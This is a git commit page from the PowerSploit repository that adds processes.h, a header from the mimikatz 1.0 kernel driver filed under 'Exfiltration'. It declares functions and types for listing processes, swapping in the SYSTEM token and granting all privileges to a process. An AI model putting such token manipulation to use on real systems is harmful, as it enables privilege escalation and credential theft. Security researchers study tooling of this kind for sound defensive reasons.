aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/driver/processes.h
diff options
context:
space:
mode:
authorMatt Graeber <mattgraeber@gmail.com>2013-10-01 14:29:34 -0700
committerMatt Graeber <mattgraeber@gmail.com>2013-10-01 14:29:34 -0700
commit6ad050fe7a54ae7c47fda4505043df8efd82bc2e (patch)
tree9c99d9aa042a4752991cfe8f0069c9a4823c8d42 /Exfiltration/mimikatz-1.0/driver/processes.h
parent23850a6337bf79d02f68912e49df12f3cde4a8dd (diff)
parent59cd18360764af6e6133ad11ec9cd8295372e587 (diff)
downloadPowerSploit-6ad050fe7a54ae7c47fda4505043df8efd82bc2e.tar.gz
PowerSploit-6ad050fe7a54ae7c47fda4505043df8efd82bc2e.zip
Merge pull request #15 from clymb3r/master
Adding GitIgnore, adding Invoke-NinjaCopy and Invoke-Mimikatz
Diffstat (limited to 'Exfiltration/mimikatz-1.0/driver/processes.h')
-rw-r--r--Exfiltration/mimikatz-1.0/driver/processes.h33
1 files changed, 33 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/driver/processes.h b/Exfiltration/mimikatz-1.0/driver/processes.h
new file mode 100644
index 0000000..ae99825
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/driver/processes.h
@@ -0,0 +1,33 @@
+#pragma once
+#include <ntifs.h>
+#include "k_types.h"
+
+#define INDEX_EPROCESS_NEXT 0
+#define INDEX_EPROCESS_FLAGS2 1
+#define INDEX_TOKEN_PRIVS 2
+#define MAX_EPROCESS_LEN 3
+
+#define TOKEN_FROZEN_MASK 0x00008000
+
+typedef struct _KIWI_NT6_PRIVILEGES
+{
+ UCHAR Present[8];
+ UCHAR Enabled[8];
+ UCHAR EnabledByDefault[8];
+} KIWI_NT6_PRIVILEGES, *PKIWI_NT6_PRIVILEGES;
+
+typedef enum _KIWI_EPROCESS_ACTION
+{
+ ListProcesses,
+ ExchangeToken,
+ FullPrivilegeNT6
+} KIWI_EPROCESS_ACTION;
+
+extern char* PsGetProcessImageFileName(PEPROCESS monProcess);
+extern NTSYSAPI NTSTATUS NTAPI ZwSetInformationProcess (__in HANDLE ProcessHandle, __in PROCESSINFOCLASS ProcessInformationClass, __in_bcount(ProcessInformationLength) PVOID ProcessInformation, __in ULONG ProcessInformationLength);
+
+NTSTATUS listProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
+NTSTATUS sysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
+NTSTATUS privProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
+
+NTSTATUS listProcessesOrSysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_EPROCESS_ACTION action); \ No newline at end of file